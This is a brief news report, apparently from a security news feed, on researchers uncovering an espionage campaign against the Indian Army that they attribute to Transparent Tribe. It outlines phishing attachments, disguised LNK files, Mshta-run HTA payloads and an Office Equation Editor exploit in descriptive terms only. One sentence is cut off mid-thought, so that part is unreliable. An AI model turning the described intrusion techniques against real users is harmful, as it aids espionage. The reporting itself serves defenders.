Researchers Uncover Cyber Espionage Operation Aimed At Indian Army

2020-09-30 08:00

The campaign's starting point is an email with an embedded malicious attachment - either in the form of a ZIP file containing an LNK file or a Microsoft Word document - that triggers an infection chain via a series of steps to download the final-stage payload. Aside from identifying three different infection chains, what's notable is the fact that one of them exploited template injection and Microsoft Equation Editor flaw, a 20-year old memory corruption issue in Microsoft Office, which, when exploited successfully, let attackers execute remote code on a vulnerable machine even without user interaction.

What's more, the LNK files have a double extension and come with document icons, thereby tricking an unsuspecting victim into opening the file.

Once opened, the LNK files abuse "Mshta.exe" to execute malicious HTA files that are hosted on fraudulent websites, with the HTA files created using an open-sourced payload generation tool called CACTUSTORCH. A Multi-stage Malware Delivery Process.

The first stage HTA file includes a decoy document and a malicious.

Although the modus operandi of naming DLL files shares similarities with the SideWinder group, the APT's heavy reliance on the open-sourced toolset and an entirely different C2 infrastructure led the researchers to conclude with reasonable confidence that the threat actor is of Pakistani origin - specifically the Transparent Tribe group, which has been recently linked to several attacks targeting the Indian military and government personnel.

News URL

http://feedproxy.google.com/~r/TheHackersNews/~3/LoOxwj96Dpo/cyberattack-indian-army.html

#army #cyberespionage #espionage #indian #researcher

News URL

Related news